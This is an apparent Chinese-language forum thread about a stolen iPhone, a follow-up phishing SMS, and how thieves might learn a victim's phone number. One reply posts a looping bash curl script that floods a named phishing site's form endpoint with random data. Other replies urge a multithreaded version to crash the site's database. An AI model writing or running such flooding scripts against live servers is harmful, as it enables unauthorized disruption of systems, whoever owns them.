iPhone 被盗之后收到一个钓鱼短信，已使用 SIM PIN 锁，小偷是如何得知手机号码的？

据闻万能到某宝可以知道，SIM 锁我记得错了三次就没了吧

还是 cn 域名，各种拍照备案实名制有什么狗屁用处？

卡的后面有一串编号，跟你的手机号是绑定的，应该是有运营商内鬼查的

只是拿到了手机号，手机和卡 PIN 码并没有解锁。到底怎么拿到的要看 PIN 是不是保护手机号码。

二楼+1

闲得无聊的老哥，保存成 sh 运行一下，不想跑了就 ctrl + c 中断吧。

while :
do
var1=$(head -246 /dev/urandom | cksum)
var2=$(head -246 /dev/urandom | cksum)
var3=$(head -246 /dev/urandom | cksum)
curl "http://www.icloud.hrsyw.cn/ht/saveb.asp" \
-H "Cookie: ASPSESSIONIDACABSAQR=IDBFEFIDGLCMLGDBFEODOGCF" \
-H "Origin: http://www.icloud.hrsyw.cn" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4" \
-H "Upgrade-Insecure-Requests: 1" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" \
-H "Cache-Control: max-age=0" \
-H "Referer: http://www.icloud.hrsyw.cn/ht/savea.asp" \
-H "Connection: keep-alive" \
--data "dna_answer_1=^%^C4^%^E3^%^D0^%^A1^%^CA^%^B1^%^BA^%^F2^%^D7^%^EE^%^CF^%^B2^%^BB^%^B6^%^C4^%^C4^%^D2^%^BB^%^B1^%^BE^%^CA^%^E9^%^A3^%^B$
-s \
--compressed > /dev/null;
done

直接打 10086 就可以根据 sim 卡上面的编号查到手机号，试过很多次。

@gam2046 老哥稳 666

@gam2046 看着像是向网站提交垃圾数据 😄
搞个 python 版吧，多线程，广泛传播。分分钟爆了他家数据库。

@gam2046 #6 老哥倒数第四行少了个引号

如果你的锁屏密码是 6 位纯数字，那直接就给你破了

@ashfinal @l9rw 散了吧。其实是用 console 复制出来，结果被自动截断了，挺长的一段。没啥的，chrome 访问一下，可以直接把请求 copy as curl。稍微包装一下，就是这样了。没啥技术含量。

@paradoxs 现在已经那么牛 X 了？

@gam2046 Safari 也能 copy as curl，之前稍微看过一点 curl 参数……
这种小站没啥防御，多线程分分钟搞瘫。别人我不知道，楼主我猜是非常愿意搞一搞的 😊

@leafleave 肯定是这样

@gam2046
delete from appleid where ip = 'x.x.x.x'

好奇上了一下那骗子网站. 想吐槽的是做坏事能不能认真点, 那又大有模糊的字体, 粗糙的版面设计.......

PIN 输错三次查 PUK 解锁啊……

@acoada @gamexg
学习了谢谢

@wql PUK 要机主身份请原件，或者网上营业厅（网上营业厅依赖手机号，或者单独邮箱账户）。所以要查 PUK 几乎是不可能的。

每个手机卡都 有 IMEI 的，有运营商人的就可以根据你的 IMEI 查到对应的手机号。